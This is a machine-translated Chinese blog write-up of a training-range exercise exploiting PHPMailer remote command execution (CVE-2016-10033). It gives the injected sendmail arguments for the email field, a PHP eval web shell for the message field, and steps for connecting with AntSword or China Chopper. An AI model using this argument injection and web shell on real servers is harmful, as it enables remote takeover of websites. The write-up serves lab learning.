当前位置:网站首页>Moher College phpmailer remote command execution vulnerability tracing
Moher College phpmailer remote command execution vulnerability tracing
2022-07-04 07:44:00 【Lyswbb】
Click to visit after you get the shooting range
Tools
Share a gadget , Used to crawl related url Link Gopher
You can see only one useful mail.php
After entering, you will come to an email test page , Obviously, this is a function point
phpmailer Introduce
PHPMailer It's a... For sending e-mail PHP Function package . Direct use PHP You can send , There is no need to build complex Email service . Related loopholes CVE Number (CVE-2016-10033)
burp Grab the bag , change email It's about payload by
"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/1.php @aaa.comchange message It's about payload by
<?php @eval($_POST[cmd]);?>
And then visit http://124.70.71.251:44768/1.php, Use ant sword or kitchen knife to connect
边栏推荐
- PCIE知识点-010:PCIE 热插拔资料从哪获取
- Activiti常見操作數據錶關系
- Relations courantes de la fiche de données d'exploitation pour les activités
- How to write a summary of the work to promote the implementation of OKR?
- SQL注入测试工具之Sqli-labs下载安装重置数据库报错解决办法之一(#0{main}thrown in D:\Software\phpstudy_pro\WWW\sqli-labs-……)
- Zephyr 學習筆記2,Scheduling
- SQL foundation 9 [grouping data]
- I was pressed for the draft, so let's talk about how long links can be as efficient as short links in the development of mobile terminals
- zabbix监控系统部署
- Introduction to sap commerce cloud B2B organization function
猜你喜欢
如何用MOS管来实现电源防反接电路
The frost peel off the purple dragon scale, and the xiariba people will talk about database SQL optimization and the principle of indexing (primary / secondary / clustered / non clustered)
Google's official response: we have not given up tensorflow and will develop side by side with Jax in the future
Routing decorator of tornado project
![[real case] how to deal with the failure of message consumption?](/img/ec/2bb2f0ff53c586bf45f364210658d7.jpg)
[real case] how to deal with the failure of message consumption?
Zephyr learning notes 1, threads
System architecture design of circle of friends
弈柯莱生物冲刺科创板:年营收3.3亿 弘晖基金与淡马锡是股东
Zephyr 學習筆記2,Scheduling
Practice (9-12 Lectures)
随机推荐
Common components of flask
zabbix监控系统部署
Oceanbase is the leader in the magic quadrant of China's database in 2021
Google's official response: we have not given up tensorflow and will develop side by side with Jax in the future
Wechat has new functions, and the test is started again
[network security] what is emergency response? What indicators should you pay attention to in emergency response?
How to write a summary of the work to promote the implementation of OKR?
2022 - 021arts: début du deuxième semestre
zabbix 5.0监控客户端
L1-022 odd even split (10 points)
Preliminary study on temporal database incluxdb 2.2
BUUCTF(3)
大学阶段总结
L1-030 one gang one (15 points)
深入浅出:了解时序数据库 InfluxDB
Take you to master the formatter of visual studio code
zabbix监控系统自定义监控内容
Experience installing VMware esxi 6.7 under VMware Workstation 16
JVM中堆概念
Zephyr 学习笔记2,Scheduling